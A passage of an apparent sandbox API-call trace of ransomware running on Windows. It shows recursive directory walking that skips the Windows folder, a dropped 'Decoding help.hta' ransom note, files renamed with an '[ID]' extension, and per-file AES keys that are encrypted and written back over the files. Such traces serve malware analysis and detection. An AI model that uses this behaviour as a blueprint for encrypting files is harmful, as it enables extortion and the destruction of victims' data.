dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5ea0c78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.722] CloseHandle (hObject=0x1c4) returned 1 [0038.722] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0038.722] lstrcmpW (lpString1=".", lpString2="tr-TR") returned -1 [0038.722] lstrcmpW (lpString1="..", lpString2="tr-TR") returned -1 [0038.723] lstrcmpiW (lpString1="windows", lpString2="tr-TR") returned 1 [0038.724] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\*.*") returned="\\\\?\\C:\\Boot\\*.*" [0038.724] lstrlenW (lpString="\\\\?\\C:\\Boot\\*.*") returned 15 [0038.724] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\", lpString2="tr-TR" | out: lpString1="\\\\?\\C:\\Boot\\tr-TR") returned="\\\\?\\C:\\Boot\\tr-TR" [0038.724] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\tr-TR", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\tr-TR\\*.*") returned="\\\\?\\C:\\Boot\\tr-TR\\*.*" [0038.724] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5eb8ce0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.725] CloseHandle (hObject=0x1c4) returned 1 [0038.725] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0038.725] lstrcmpW (lpString1=".", lpString2="zh-CN") returned -1 [0038.725] lstrcmpW (lpString1="..", lpString2="zh-CN") returned -1 [0038.725] lstrcmpiW (lpString1="windows", lpString2="zh-CN") returned -1 [0038.726] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\*.*") returned="\\\\?\\C:\\Boot\\*.*" [0038.726] lstrlenW (lpString="\\\\?\\C:\\Boot\\*.*") returned 15 [0038.726] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\", lpString2="zh-CN" | out: lpString1="\\\\?\\C:\\Boot\\zh-CN") returned="\\\\?\\C:\\Boot\\zh-CN" [0038.726] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\zh-CN", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\zh-CN\\*.*") returned="\\\\?\\C:\\Boot\\zh-CN\\*.*" [0038.726] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5ed0d48, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.727] CloseHandle (hObject=0x1c4) returned 1 [0038.727] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0038.727] lstrcmpW (lpString1=".", lpString2="zh-HK") returned -1 [0038.727] lstrcmpW (lpString1="..", lpString2="zh-HK") returned -1 [0038.727] lstrcmpiW (lpString1="windows", lpString2="zh-HK") returned -1 [0038.729] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\*.*") returned="\\\\?\\C:\\Boot\\*.*" [0038.729] lstrlenW (lpString="\\\\?\\C:\\Boot\\*.*") returned 15 [0038.729] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\", lpString2="zh-HK" | out: lpString1="\\\\?\\C:\\Boot\\zh-HK") returned="\\\\?\\C:\\Boot\\zh-HK" [0038.729] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\zh-HK", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\zh-HK\\*.*") returned="\\\\?\\C:\\Boot\\zh-HK\\*.*" [0038.729] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5ee8db0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.730] CloseHandle (hObject=0x1c4) returned 1 [0038.730] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0038.730] lstrcmpW (lpString1=".", lpString2="zh-TW") returned -1 [0038.730] lstrcmpW (lpString1="..", lpString2="zh-TW") returned -1 [0038.730] lstrcmpiW (lpString1="windows", lpString2="zh-TW") returned -1 [0038.731] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\*.*") returned="\\\\?\\C:\\Boot\\*.*" [0038.731] lstrlenW (lpString="\\\\?\\C:\\Boot\\*.*") returned 15 [0038.731] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\", lpString2="zh-TW" | out: lpString1="\\\\?\\C:\\Boot\\zh-TW") returned="\\\\?\\C:\\Boot\\zh-TW" [0038.731] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\zh-TW", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\zh-TW\\*.*") returned="\\\\?\\C:\\Boot\\zh-TW\\*.*" [0038.731] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5f00e18, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.818] CloseHandle (hObject=0x1c4) returned 1 [0038.818] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0038.818] FindClose (in: hFindFile=0x5a52f0 | out: hFindFile=0x5a52f0) returned 1 Thread: id = 13 os_tid = 0xa68 [0038.500] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Config.Msi\\*.*", lpFindFileData=0x320fd30 | out: lpFindFileData=0x320fd30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52b0 [0038.500] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0038.500] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x320fd30 | out: lpFindFileData=0x320fd30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.500] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0038.500] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0038.500] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x320fd30 | out: lpFindFileData=0x320fd30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0038.500] FindClose (in: hFindFile=0x5a52b0 | out: hFindFile=0x5a52b0) returned 1 Thread: id = 14 os_tid = 0xa6c [0038.505] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Documents and Settings\\*.*", lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 15 os_tid = 0xa70 [0038.508] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\*.*", lpFindFileData=0x358fd30 | out: lpFindFileData=0x358fd30*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5430 [0038.508] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0038.508] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x358fd30 | out: lpFindFileData=0x358fd30*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.508] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0038.508] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0038.508] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x358fd30 | out: lpFindFileData=0x358fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0038.508] lstrcmpW (lpString1=".", lpString2="All Users") returned -1 [0038.508] lstrcmpW (lpString1="..", lpString2="All Users") returned -1 [0038.508] lstrcmpiW (lpString1="windows", lpString2="All Users") returned 1 [0038.509] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\*.*") returned="\\\\?\\C:\\MSOCache\\*.*" [0038.509] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\*.*") returned 19 [0038.509] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\", lpString2="All Users" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users") returned="\\\\?\\C:\\MSOCache\\All Users" [0038.509] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\*.*" [0038.509] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x603e28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x188 [0038.513] CloseHandle (hObject=0x188) returned 1 [0038.514] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x358fd30 | out: lpFindFileData=0x358fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 0 [0038.514] FindClose (in: hFindFile=0x5a5430 | out: hFindFile=0x5a5430) returned 1 Thread: id = 16 os_tid = 0xa74 [0038.511] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\*.*", lpFindFileData=0x36cfd30 | out: lpFindFileData=0x36cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a53f0 [0038.511] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0038.511] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x36cfd30 | out: lpFindFileData=0x36cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.512] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0038.512] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0038.512] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x36cfd30 | out: lpFindFileData=0x36cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 1 [0038.512] lstrcmpW (lpString1=".", lpString2="Admin") returned -1 [0038.512] lstrcmpW (lpString1="..", lpString2="Admin") returned -1 [0038.512] lstrcmpiW (lpString1="windows", lpString2="Admin") returned 1 [0038.513] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\PerfLogs\\*.*" | out: lpString1="\\\\?\\C:\\PerfLogs\\*.*") returned="\\\\?\\C:\\PerfLogs\\*.*" [0038.513] lstrlenW (lpString="\\\\?\\C:\\PerfLogs\\*.*") returned 19 [0038.513] lstrcatW (in: lpString1="\\\\?\\C:\\PerfLogs\\", lpString2="Admin" | out: lpString1="\\\\?\\C:\\PerfLogs\\Admin") returned="\\\\?\\C:\\PerfLogs\\Admin" [0038.513] lstrcatW (in: lpString1="\\\\?\\C:\\PerfLogs\\Admin", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\PerfLogs\\Admin\\*.*") returned="\\\\?\\C:\\PerfLogs\\Admin\\*.*" [0038.513] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x633ef8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0038.520] CloseHandle (hObject=0x1a8) returned 1 [0038.520] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x36cfd30 | out: lpFindFileData=0x36cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 0 [0038.520] FindClose (in: hFindFile=0x5a53f0 | out: hFindFile=0x5a53f0) returned 1 Thread: id = 17 os_tid = 0xa78 [0038.522] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\*.*", lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1725f090, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1725f090, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a53f0 [0038.522] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0038.522] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1725f090, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1725f090, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.522] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0038.522] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0038.522] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x69da35f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69da35f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0038.522] lstrcmpW (lpString1=".", lpString2="Common Files") returned -1 [0038.522] lstrcmpW (lpString1="..", lpString2="Common Files") returned -1 [0038.522] lstrcmpiW (lpString1="windows", lpString2="Common Files") returned 1 [0038.522] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\*.*") returned="\\\\?\\C:\\Program Files\\*.*" [0038.522] lstrlenW (lpString="\\\\?\\C:\\Program Files\\*.*") returned 24 [0038.534] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\", lpString2="Common Files" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files") returned="\\\\?\\C:\\Program Files\\Common Files" [0038.534] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\*.*" [0038.534] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x64bf60, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0038.540] CloseHandle (hObject=0x1a8) returned 1 [0038.540] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28ae853d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28ae853d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28ae853d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0038.540] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\*.*") returned="\\\\?\\C:\\Program Files\\*.*" [0038.540] lstrlenW (lpString="\\\\?\\C:\\Program Files\\*.*") returned 24 [0038.541] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Decoding help.hta" [0038.541] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Decoding help.hta" (normalized: "c:\\program files\\decoding help.hta")) returned 0xffffffff [0038.541] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Decoding help.hta" (normalized: "c:\\program files\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0038.541] WriteFile (in: hFile=0x1a8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x380fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x380fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0038.542] CloseHandle (hObject=0x1a8) returned 1 [0038.542] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0038.542] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0038.543] lstrlenW (lpString="desktop.ini") returned 11 [0038.543] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\*.*") returned="\\\\?\\C:\\Program Files\\*.*" [0038.543] lstrlenW (lpString="\\\\?\\C:\\Program Files\\*.*") returned 24 [0038.543] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Program Files\\desktop.ini") returned="\\\\?\\C:\\Program Files\\desktop.ini" [0038.543] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\desktop.ini" | out: lpString1="\\\\?\\C:\\Program Files\\desktop.ini") returned="\\\\?\\C:\\Program Files\\desktop.ini" [0038.543] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0038.543] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Program Files\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0038.543] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0038.543] CreateFileMappingA (hFile=0x1a8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x188 [0038.543] CryptAcquireContextA (in: phProv=0x380fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x380fcec*=0x5a7c68) returned 1 [0038.544] CryptGenKey (in: hProv=0x5a7c68, Algid=0x6610, dwFlags=0x1, phKey=0x380fce8 | out: phKey=0x380fce8*=0x5a5330) returned 1 [0038.544] CryptExportKey (in: hKey=0x5a5330, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x380fbe4, pdwDataLen=0x380fce4 | out: pbData=0x380fbe4*, pdwDataLen=0x380fce4*=0x2c) returned 1 [0038.544] MapViewOfFile (hFileMappingObject=0x188, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa0) returned 0x2d0000 [0038.547] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380fbe4*, pdwDataLen=0x380fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x380fbe4*, pdwDataLen=0x380fcf8*=0x100) returned 1 [0038.548] CryptEncrypt (in: hKey=0x5a5330, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000*, pdwDataLen=0x380fce4*=0xa0, dwBufLen=0xa0 | out: pbData=0x2d0000*, pdwDataLen=0x380fce4*=0xa0) returned 1 [0038.548] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0038.548] CloseHandle (hObject=0x188) returned 1 [0038.548] CryptDestroyKey (hKey=0x5a5330) returned 1 [0038.548] CryptReleaseContext (hProv=0x5a7c68, dwFlags=0x0) returned 1 [0038.548] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.548] WriteFile (in: hFile=0x1a8, lpBuffer=0x380fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x380fcf8, lpOverlapped=0x0 | out: lpBuffer=0x380fbe4*, lpNumberOfBytesWritten=0x380fcf8*=0x100, lpOverlapped=0x0) returned 1 [0038.549] WriteFile (in: hFile=0x1a8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x380fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x380fcf8*=0x500, lpOverlapped=0x0) returned 1 [0038.549] CloseHandle (hObject=0x1a8) returned 1 [0038.550] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0038.550] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x380fd30 | out: 